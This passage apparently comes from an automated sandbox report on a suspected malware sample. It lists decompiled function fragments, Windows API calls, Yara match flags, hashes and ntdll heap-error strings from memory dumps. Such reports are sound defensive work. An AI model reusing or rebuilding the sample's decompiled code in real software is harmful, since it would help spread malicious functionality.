                                                      0x0040833a
                                                      0x0040833d
                                                      0x0040834a
                                                      0x0040834c
                                                      0x0040834e
                                                      0x0040836b
                                                      0x0040836b
                                                      0x00000000
                                                      0x0040836d
                                                      0x00408372

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                      • Instruction ID: dfcb319d37f54b0a0ecf43278dd58f432490a67f975cf55f4cf339e9819450c2
                                                      • Opcode Fuzzy Hash: 0595ec560e788dbfdde41257eb2d5c19e7e4730fabfde42c32a3ab1d63c44655
                                                      • Instruction Fuzzy Hash: 1A01A731A803287BE720A6A59C43FFF776C6B40F54F05411EFF04BA1C1E6A9691546FA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A1B6, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 21a8f2689580e755f7b757598a0f2aa8366664878adf19234cbfe86c2bd415a6
                                                      • Instruction ID: 1445e5750056d55ac064b3170d804730853a9bb88503f1426e742f650417b34b
                                                      • Opcode Fuzzy Hash: 21a8f2689580e755f7b757598a0f2aa8366664878adf19234cbfe86c2bd415a6
                                                      • Instruction Fuzzy Hash: 26017CB62042146BDB14DF99DC85EEB77ADEF88760F00845AFA185B241C630FA10CBE4
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00408373, Relevance: 1.5, APIs: 1, Instructions: 46threadwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 57%
                                                      			E00408373(void* __edx) {
				void* _t9;
				int _t10;
				long _t17;
				intOrPtr _t19;
				int _t21;
				void* _t23;
				void* _t24;
				unsigned char _t30;

				asm("sbb ebp, ecx");
				_t24 = _t23 - 1;
				_t1 = __edx + 3;
				 *_t1 =  *(__edx + 3) >> 0x51;
				_t30 =  *_t1;
				E0041C5C0();
				_t19 =  *((intOrPtr*)(_t24 + 8));
				_t9 = E0040ACC0(_t30, _t19 + 0x1c, _t24 - 0x40); // executed
				_t10 = E00414E10(_t19 + 0x1c, _t9, 0, 0, 0xc4e7b6d6);
				_t21 = _t10;
				if(_t21 != 0) {
					_t17 =  *(_t24 + 0xc);
					_t10 = PostThreadMessageW(_t17, 0x111, 0, 0); // executed
					_t32 = _t10;
					if(_t10 == 0) {
						_t10 =  *_t21(_t17, 0x8003, _t24 + (E0040A450(_t32, 1, 8) & 0x000000ff) - 0x40, _t10);
					}
				}
				return _t10;
			}











                                                      0x00408373
                                                      0x00408309
                                                      0x0040830a
                                                      0x0040830a
                                                      0x0040830a
                                                      0x0040830e
                                                      0x00408313
                                                      0x0040831e
                                                      0x0040832e
                                                      0x00408333
                                                      0x0040833a
                                                      0x0040833d
                                                      0x0040834a
                                                      0x0040834c
                                                      0x0040834e
                                                      0x0040836b
                                                      0x0040836b
                                                      0x0040836d
                                                      0x00408372

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 5a9f374e846b13def46fd236402283cbce8c9179e96ee39bcc8b17d8c8c9dabc
                                                      • Instruction ID: 340ef0dd0364ee288b267a102dcd17c54c3b4f6f066a6f6c1b29bd0551d5ce22
                                                      • Opcode Fuzzy Hash: 5a9f374e846b13def46fd236402283cbce8c9179e96ee39bcc8b17d8c8c9dabc
                                                      • Instruction Fuzzy Hash: F3F0F631A807287AE71076644D02FFF76186B80F15F15426EFE04BA2C2EAFD691606E9
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 004082B3, Relevance: 1.5, APIs: 1, Instructions: 41threadwindowCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 75%
                                                      			E004082B3(void* __esi) {
				void* _t5;
				int _t6;
				long _t12;
				int _t16;
				void* _t18;
				void* _t24;

				_t5 = E0040ACC0(_t24, __esi + 0x1c, _t18 - 0x40); // executed
				_t6 = E00414E10(__esi + 0x1c, _t5, 0, 0, 0xc4e7b6d6);
				_t16 = _t6;
				if(_t16 != 0) {
					_t12 =  *(_t18 + 0xc);
					_t6 = PostThreadMessageW(_t12, 0x111, 0, 0); // executed
					_t26 = _t6;
					if(_t6 == 0) {
						_t6 =  *_t16(_t12, 0x8003, _t18 + (E0040A450(_t26, 1, 8) & 0x000000ff) - 0x40, _t6);
					}
				}
				return _t6;
			}









                                                      0x0040831e
                                                      0x0040832e
                                                      0x00408333
                                                      0x0040833a
                                                      0x0040833d
                                                      0x0040834a
                                                      0x0040834c
                                                      0x0040834e
                                                      0x0040836b
                                                      0x0040836b
                                                      0x0040836d
                                                      0x00408372

                                                      APIs
                                                      • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 0040834A
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: MessagePostThread
                                                      • String ID:
                                                      • API String ID: 1836367815-0
                                                      • Opcode ID: 17a38464d72613c1942b7b43a1cc9293874683b177593362508ebfcb078e09f7
                                                      • Instruction ID: 04c9ba4c817a4b39796bfa22603aea6b38b32933f0f46f205ba64fe2c064927a
                                                      • Opcode Fuzzy Hash: 17a38464d72613c1942b7b43a1cc9293874683b177593362508ebfcb078e09f7
                                                      • Instruction Fuzzy Hash: 25F08231B806243AE62065955D43FBF66186B80F15F15412EFF04FA2C1EAFD291606EA
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A381, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: dae679a2c8e472f8eba74482c5ff138022dd817cd9814bccb7c796c2c0c9fc86
                                                      • Instruction ID: f81da64547fe679c07cba3092e1a56531ae0b8d8bfc0ede6110c9ce11a4a5771
                                                      • Opcode Fuzzy Hash: dae679a2c8e472f8eba74482c5ff138022dd817cd9814bccb7c796c2c0c9fc86
                                                      • Instruction Fuzzy Hash: 09E06DB1200218BBCA10EF99DC80EDB37AA9F84724F108566FA086B741C934F850CBF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A230, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 30%
                                                      			E0041A230(void* __ebx, signed int __ecx, void* __edx, void* __esi, void* _a4, void* _a8, long _a12, void* _a16) {
				void* _v3;
				char _t15;
				void* _t22;

				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
				E0041AB20(_t22);
				_t15 = RtlFreeHeap(_a8, _a12, _a16); // executed
				return _t15;
			}






                                                      0x0041a235
                                                      0x0041a244
                                                      0x0041a247
                                                      0x0041a25d
                                                      0x0041a261

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction ID: 9eb97300d5e10087c94d33d02e30a743291ab6cce32cf35ae9b88dc6f9268b02
                                                      • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                      • Instruction Fuzzy Hash: 0EE01AB12002046BD714DF59DC45EA777ADAF88754F014559BA0857241C630F910CAB0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A390, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction ID: bf4187e38ed515452a76a24d05e88418ebf87a1f9c5c0c5d517d21230e680a96
                                                      • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                      • Instruction Fuzzy Hash: DEE01AB12002086BDB10DF49DC85EE737ADAF88654F018155BA0857241C934F8108BF5
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A405, Relevance: 1.5, APIs: 1, Instructions: 21COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • LookupPrivilegeValueW.ADVAPI32(00000000,0000003C,0040F192,0040F192,0000003C,00000000,?,00409D35), ref: 0041A3C0
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: LookupPrivilegeValue
                                                      • String ID:
                                                      • API String ID: 3899507212-0
                                                      • Opcode ID: 5da8310e1d07f192b56cb8cba9071fc35e5510fd99ef5d8f3cf2f35ea9e925c3
                                                      • Instruction ID: c16ce2f19ca2d23fbb7dae673e92ec723c1f6492d3f47f4ff7a76828f41699ed
                                                      • Opcode Fuzzy Hash: 5da8310e1d07f192b56cb8cba9071fc35e5510fd99ef5d8f3cf2f35ea9e925c3
                                                      • Instruction Fuzzy Hash: F3E08CB4104285EBC700EF28E890CEBBB2ADF852143108047F80983202C334E930CBB2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A270, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E0041A270(intOrPtr _a4, int _a8) {
				void* _t10;
				void* _t11;

				E0041AB20(_t10, _a4, _a4 + 0xc7c,  *((intOrPtr*)(_a4 + 0xa14)), 0, 0x36, _t11);
				ExitProcess(_a8);
			}





                                                      0x0041a28a
                                                      0x0041a298

                                                      APIs
                                                      • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 0041A298
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExitProcess
                                                      • String ID:
                                                      • API String ID: 621844428-0
                                                      • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction ID: 654422823446a6dc42c61fec1171b68ac592b5503343b56bfda4b4a103558910
                                                      • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                      • Instruction Fuzzy Hash: 1FD017726042187BD620EB99DC85FD777ADDF487A4F0180AABA1C6B242C531BA10CBE1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0041A234, Relevance: 1.5, APIs: 1, Instructions: 19memoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 30%
                                                      			E0041A234(void* __eax, void* __ebx, signed int __ecx, void* __edx, void* __esi) {
				char _t14;
				void* _t21;
				void* _t24;

				_t25 = _t24 + 1;
				 *(__ebx + 0x6a561048) =  *(__ebx + 0x6a561048) | __ecx;
				 *((intOrPtr*)(__esi + 0x50)) =  *((intOrPtr*)(__esi + 0x50)) + __edx;
				E0041AB20(_t21);
				_t14 = RtlFreeHeap( *(_t24 + 0xd),  *(_t24 + 0x11),  *(_t25 + 0x14)); // executed
				return _t14;
			}






                                                      0x0041a234
                                                      0x0041a235
                                                      0x0041a244
                                                      0x0041a247
                                                      0x0041a25d
                                                      0x0041a261

                                                      APIs
                                                      • RtlFreeHeap.NTDLL(00000060,00409CC3,?,?,00409CC3,00000060,00000000,00000000,?,?,00409CC3,?,00000000), ref: 0041A25D
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.393244469.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                      Yara matches
                                                      Similarity
                                                      • API ID: FreeHeap
                                                      • String ID:
                                                      • API String ID: 3298025750-0
                                                      • Opcode ID: 407736451d95f8e1ab8699c3872c8790593c26f10a37ddf22fb502eee4eedece
                                                      • Instruction ID: fcb3eeebfb7adec86ef2b62e20fe7d7f81c34a93cc2729fa91ca5bbf877f4bee
                                                      • Opcode Fuzzy Hash: 407736451d95f8e1ab8699c3872c8790593c26f10a37ddf22fb502eee4eedece
                                                      • Instruction Fuzzy Hash: EAD02BB81042845BDB10EF69E8C089B37D5BF803187108A4BFC5C47303C130E869CBB1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017E967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID: InitializeThunk
                                                      • String ID:
                                                      • API String ID: 2994545307-0
                                                      • Opcode ID: 0db4f55efd2fc650b74e2ce093525a20a929cfc341adfb8f1729b69041f1adbb
                                                      • Instruction ID: f7c643861ef5564493646191c02feeeb7af93e8d146f5df96eb580dfaed93c80
                                                      • Opcode Fuzzy Hash: 0db4f55efd2fc650b74e2ce093525a20a929cfc341adfb8f1729b69041f1adbb
                                                      • Instruction Fuzzy Hash: FBB09B729054C5C9D621D7A4860C717F94077D4745F17C066D3020651B4778C0D1F5B6
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Non-executed Functions

                                                      Function 0185B260, Relevance: 37.8, Strings: 30, Instructions: 262COMMON
                                                      Download Yara Rule
                                                      Strings
                                                      • This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked., xrefs: 0185B305
                                                      • a NULL pointer, xrefs: 0185B4E0
                                                      • *** then kb to get the faulting stack, xrefs: 0185B51C
                                                      • *** Resource timeout (%p) in %ws:%s, xrefs: 0185B352
                                                      • The instruction at %p referenced memory at %p., xrefs: 0185B432
                                                      • *** Inpage error in %ws:%s, xrefs: 0185B418
                                                      • write to, xrefs: 0185B4A6
                                                      • *** Unhandled exception 0x%08lx, hit in %ws:%s, xrefs: 0185B2DC
                                                      • Go determine why that thread has not released the critical section., xrefs: 0185B3C5
                                                      • *** enter .exr %p for the exception record, xrefs: 0185B4F1
                                                      • The critical section is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0185B3D6
                                                      • This failed because of error %Ix., xrefs: 0185B446
                                                      • This means the data could not be read, typically because of a bad block on the disk. Check your hardware., xrefs: 0185B47D
                                                      • *** A stack buffer overrun occurred in %ws:%s, xrefs: 0185B2F3
                                                      • *** An Access Violation occurred in %ws:%s, xrefs: 0185B48F
                                                      • The resource is unowned. This usually implies a slow-moving machine due to memory pressure, xrefs: 0185B38F
                                                      • The resource is owned exclusively by thread %p, xrefs: 0185B374
                                                      • an invalid address, %p, xrefs: 0185B4CF
                                                      • This means the machine is out of memory. Use !vm to see where all the memory is being used., xrefs: 0185B484
                                                      • The critical section is owned by thread %p., xrefs: 0185B3B9
                                                      • read from, xrefs: 0185B4AD, 0185B4B2
                                                      • This means that the I/O device reported an I/O error. Check your hardware., xrefs: 0185B476
                                                      • *** Restarting wait on critsec or resource at %p (in %ws:%s), xrefs: 0185B53F
                                                      • The instruction at %p tried to %s , xrefs: 0185B4B6
                                                      • <unknown>, xrefs: 0185B27E, 0185B2D1, 0185B350, 0185B399, 0185B417, 0185B48E
                                                      • The resource is owned shared by %d threads, xrefs: 0185B37E
                                                      • If this bug ends up in the shipping product, it could be a severe security hole., xrefs: 0185B314
                                                      • The stack trace should show the guilty function (the function directly above __report_gsfailure)., xrefs: 0185B323
                                                      • *** enter .cxr %p for the context, xrefs: 0185B50D
                                                      • *** Critical Section Timeout (%p) in %ws:%s, xrefs: 0185B39B
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: *** A stack buffer overrun occurred in %ws:%s$ *** An Access Violation occurred in %ws:%s$ *** Critical Section Timeout (%p) in %ws:%s$ *** Inpage error in %ws:%s$ *** Resource timeout (%p) in %ws:%s$ *** Unhandled exception 0x%08lx, hit in %ws:%s$ *** enter .cxr %p for the context$ *** Restarting wait on critsec or resource at %p (in %ws:%s)$ *** enter .exr %p for the exception record$ *** then kb to get the faulting stack$<unknown>$Go determine why that thread has not released the critical section.$If this bug ends up in the shipping product, it could be a severe security hole.$The critical section is owned by thread %p.$The critical section is unowned. This usually implies a slow-moving machine due to memory pressure$The instruction at %p referenced memory at %p.$The instruction at %p tried to %s $The resource is owned exclusively by thread %p$The resource is owned shared by %d threads$The resource is unowned. This usually implies a slow-moving machine due to memory pressure$The stack trace should show the guilty function (the function directly above __report_gsfailure).$This failed because of error %Ix.$This is usually the result of a memory copy to a local buffer or structure where the size is not properly calculated/checked.$This means that the I/O device reported an I/O error. Check your hardware.$This means the data could not be read, typically because of a bad block on the disk. Check your hardware.$This means the machine is out of memory. Use !vm to see where all the memory is being used.$a NULL pointer$an invalid address, %p$read from$write to
                                                      • API String ID: 0-108210295
                                                      • Opcode ID: d156acb15747a40286d8645e88f39fd3595c85317210641b4a69306c2ca4d7f7
                                                      • Instruction ID: acf658629af85367709d14d6cd505f05f29d9076e028590257a2d442d72fef26
                                                      • Opcode Fuzzy Hash: d156acb15747a40286d8645e88f39fd3595c85317210641b4a69306c2ca4d7f7
                                                      • Instruction Fuzzy Hash: 278105B1A40200FFDF369A4ADC96D7B7F67EFA6B55F440048F904AB212D2618751C7B2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01861C06, Relevance: 31.4, Strings: 25, Instructions: 195COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 44%
                                                      			E01861C06() {
				signed int _t27;
				char* _t104;
				char* _t105;
				intOrPtr _t113;
				intOrPtr _t115;
				intOrPtr _t117;
				intOrPtr _t119;
				intOrPtr _t120;

				_t105 = 0x17848a4;
				_t104 = "HEAP: ";
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017AB150();
				} else {
					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push( *0x189589c);
				E017AB150("Heap error detected at %p (heap handle %p)\n",  *0x18958a0);
				_t27 =  *0x1895898; // 0x0
				if(_t27 <= 0xf) {
					switch( *((intOrPtr*)(_t27 * 4 +  &M01861E96))) {
						case 0:
							_t105 = "heap_failure_internal";
							goto L21;
						case 1:
							goto L21;
						case 2:
							goto L21;
						case 3:
							goto L21;
						case 4:
							goto L21;
						case 5:
							goto L21;
						case 6:
							goto L21;
						case 7:
							goto L21;
						case 8:
							goto L21;
						case 9:
							goto L21;
						case 0xa:
							goto L21;
						case 0xb:
							goto L21;
						case 0xc:
							goto L21;
						case 0xd:
							goto L21;
						case 0xe:
							goto L21;
						case 0xf:
							goto L21;
					}
				}
				L21:
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017AB150();
				} else {
					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				_push(_t105);
				E017AB150("Error code: %d - %s\n",  *0x1895898);
				_t113 =  *0x18958a4; // 0x0
				if(_t113 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017AB150("Parameter1: %p\n",  *0x18958a4);
				}
				_t115 =  *0x18958a8; // 0x0
				if(_t115 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017AB150("Parameter2: %p\n",  *0x18958a8);
				}
				_t117 =  *0x18958ac; // 0x0
				if(_t117 != 0) {
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					E017AB150("Parameter3: %p\n",  *0x18958ac);
				}
				_t119 =  *0x18958b0; // 0x0
				if(_t119 != 0) {
					L41:
					if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
						_push(_t104);
						E017AB150();
					} else {
						E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
					}
					_push( *0x18958b4);
					E017AB150("Last known valid blocks: before - %p, after - %p\n",  *0x18958b0);
				} else {
					_t120 =  *0x18958b4; // 0x0
					if(_t120 != 0) {
						goto L41;
					}
				}
				if( *((intOrPtr*)( *[fs:0x30] + 0xc)) == 0) {
					_push(_t104);
					E017AB150();
				} else {
					E017AB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
				}
				return E017AB150("Stack trace available at %p\n", 0x18958c0);
			}











                                                      0x01861c10
                                                      0x01861c16
                                                      0x01861c1e
                                                      0x01861c3d
                                                      0x01861c3e
                                                      0x01861c20
                                                      0x01861c35
                                                      0x01861c3a
                                                      0x01861c44
                                                      0x01861c55
                                                      0x01861c5a
                                                      0x01861c65
                                                      0x01861c67
                                                      0x00000000
                                                      0x01861c6e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01861c67
                                                      0x01861cdc
                                                      0x01861ce5
                                                      0x01861d04
                                                      0x01861d05
                                                      0x01861ce7
                                                      0x01861cfc
                                                      0x01861d01
                                                      0x01861d0b
                                                      0x01861d17
                                                      0x01861d1f
                                                      0x01861d25
                                                      0x01861d30
                                                      0x01861d4f
                                                      0x01861d50
                                                      0x01861d32
                                                      0x01861d47
                                                      0x01861d4c
                                                      0x01861d61
                                                      0x01861d67
                                                      0x01861d68
                                                      0x01861d6e
                                                      0x01861d79
                                                      0x01861d98
                                                      0x01861d99
                                                      0x01861d7b
                                                      0x01861d90
                                                      0x01861d95
                                                      0x01861daa
                                                      0x01861db0
                                                      0x01861db1
                                                      0x01861db7
                                                      0x01861dc2
                                                      0x01861de1
                                                      0x01861de2
                                                      0x01861dc4
                                                      0x01861dd9
                                                      0x01861dde
                                                      0x01861df3
                                                      0x01861df9
                                                      0x01861dfa
                                                      0x01861e00
                                                      0x01861e0a
                                                      0x01861e13
                                                      0x01861e32
                                                      0x01861e33
                                                      0x01861e15
                                                      0x01861e2a
                                                      0x01861e2f
                                                      0x01861e39
                                                      0x01861e4a
                                                      0x01861e02
                                                      0x01861e02
                                                      0x01861e08
                                                      0x00000000
                                                      0x00000000
                                                      0x01861e08
                                                      0x01861e5b
                                                      0x01861e7a
                                                      0x01861e7b
                                                      0x01861e5d
                                                      0x01861e72
                                                      0x01861e77
                                                      0x01861e95

                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000002.00000002.394726927.0000000001780000.00000040.00000001.sdmp, Offset: 01780000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID: Error code: %d - %s$HEAP: $HEAP[%wZ]: $Heap error detected at %p (heap handle %p)$Last known valid blocks: before - %p, after - %p$Parameter1: %p$Parameter2: %p$Parameter3: %p$Stack trace available at %p$heap_failure_block_not_busy$heap_failure_buffer_overrun$heap_failure_buffer_underrun$heap_failure_cross_heap_operation$heap_failure_entry_corruption$heap_failure_freelists_corruption$heap_failure_generic$heap_failure_internal$heap_failure_invalid_allocation_type$heap_failure_invalid_argument$heap_failure_lfh_bitmap_mismatch$heap_failure_listentry_corruption$heap_failure_multiple_entries_corruption$heap_failure_unknown$heap_failure_usage_after_free$heap_failure_virtual_block_corruption
                                                      • API String ID: 0-2897834094
                                                      • Opcode ID: 809418154b7d69afe69c2cac46422c544604145cb16014999f6a0ab0bd4bbc60
                                                      • Instruction ID: 1a7f6bb0392e9d68d3282a2c04e57932aff82895a72b6c5a4d076b0e440544a7
                                                      • Opcode Fuzzy Hash: 809418154b7d69afe69c2cac46422c544604145cb16014999f6a0ab0bd4bbc60
                                                      • Instruction Fuzzy Hash: BA61E833955149DFD721EB49E8DCD25F3A8E794B20B49813EF409AF316DA249A40CF0A
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017B3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E017B3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E017B1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E017B1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L017C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E017B1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E017B1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
